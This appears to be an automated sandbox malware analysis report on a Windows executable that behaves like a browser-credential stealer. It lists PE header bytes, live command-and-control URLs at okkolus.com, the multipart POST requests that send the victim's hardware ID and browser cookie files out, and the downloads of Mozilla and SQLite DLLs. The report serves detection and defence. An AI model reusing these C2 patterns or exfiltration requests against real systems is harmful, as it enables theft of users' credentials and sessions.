00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "6dde8-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 450024Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 
40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 06 May 2024 00:52:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:49:08 GMT ETag: "1f3950-5e7ef2e90e100" Accept-Ranges: bytes Content-Length: 2046288 Connection: close Content-Type: application/x-msdos-program
                      Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 06 May 2024 00:53:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:49:08 GMT ETag: "3ef50-5e7ef2e90e100" Accept-Ranges: bytes Content-Length: 257872 Connection: close Content-Type: application/x-msdos-program
                      Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 06 May 2024 00:53:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:49:08 GMT ETag: "13bf0-5e7ef2e90e100" Accept-Ranges: bytes Content-Length: 80880 Connection: close Content-Type: application/x-msdos-program
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAF Host: okkolus.com Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------EHJDGHJDBFIJKECAECAF Content-Disposition: form-data; name="hwid" A884905680612789573209 ------EHJDGHJDBFIJKECAECAF Content-Disposition: form-data; name="build" unik ------EHJDGHJDBFIJKECAECAF--
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCA Host: okkolus.com Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------KJJKEBGHJKFIDGCAAFCA Content-Disposition: form-data; name="token" 9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5 ------KJJKEBGHJKFIDGCAAFCA Content-Disposition: form-data; name="message" browsers ------KJJKEBGHJKFIDGCAAFCA--
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC Host: okkolus.com Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------AEBGIEGCFHCFHIDHIJEC Content-Disposition: form-data; name="token" 9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5 ------AEBGIEGCFHCFHIDHIJEC Content-Disposition: form-data; name="message" plugins ------AEBGIEGCFHCFHIDHIJEC--
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCB Host: okkolus.com Content-Length: 6247 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH Host: okkolus.com Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------EBAAFCAFCBKFHJJJKKFH Content-Disposition: form-data; name="token" 9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5 ------EBAAFCAFCBKFHJJJKKFH Content-Disposition: form-data; name="file_name" Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0 ------EBAAFCAFCBKFHJJJKKFH Content-Disposition: form-data; name="file" Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBA Host: okkolus.com Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------CGDGHCBGDHJJKECAECBA Content-Disposition: form-data; name="token" 9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5 ------CGDGHCBGDHJJKECAECBA Content-Disposition: form-data; name="file_name" ZWltZWhydnpvZC5maWxl ------CGDGHCBGDHJJKECAECBA Content-Disposition: form-data; name="file" ------CGDGHCBGDHJJKECAECBA--
                      Source: global traffic; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG Host: okkolus.com Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JECBGCFHCFIDHIDHDGDG Content-Disposition: form-data; name="token" 9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5 ------JECBGCFHCFIDHIDHDGDG Content-Disposition: form-data; name="file_name" ZWltZWhydnpvZC5maWxl ------JECBGCFHCFIDHIDHDGDG Content-Disposition: form-data; name="file" ------JECBGCFHCFIDHIDHDGDG--
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: Joe Sandbox View; ASN Name: ASRELINKRU ASRELINKRU
                      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe; Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1 Host: okkolus.com Cache-Control: no-cache
                      Source: global traffic; DNS traffic detected: DNS query: okkolus.com
                      Source: unknown; HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAF Host: okkolus.com Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------EHJDGHJDBFIJKECAECAF Content-Disposition: form-data; name="hwid" A884905680612789573209 ------EHJDGHJDBFIJKECAECAF Content-Disposition: form-data; name="build" unik ------EHJDGHJDBFIJKECAECAF--
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0A
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0X
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php&)
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php/M
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpN
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpt
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpte3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dlld
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllser
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dller
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll.U
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll9M
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllJT
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlle
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllllx
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlloU
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/oTab
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/ra
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/soft
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dller
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/sqlite3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.comppData
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                      Source: JEHIJDGI.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: JEHIJDGI.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
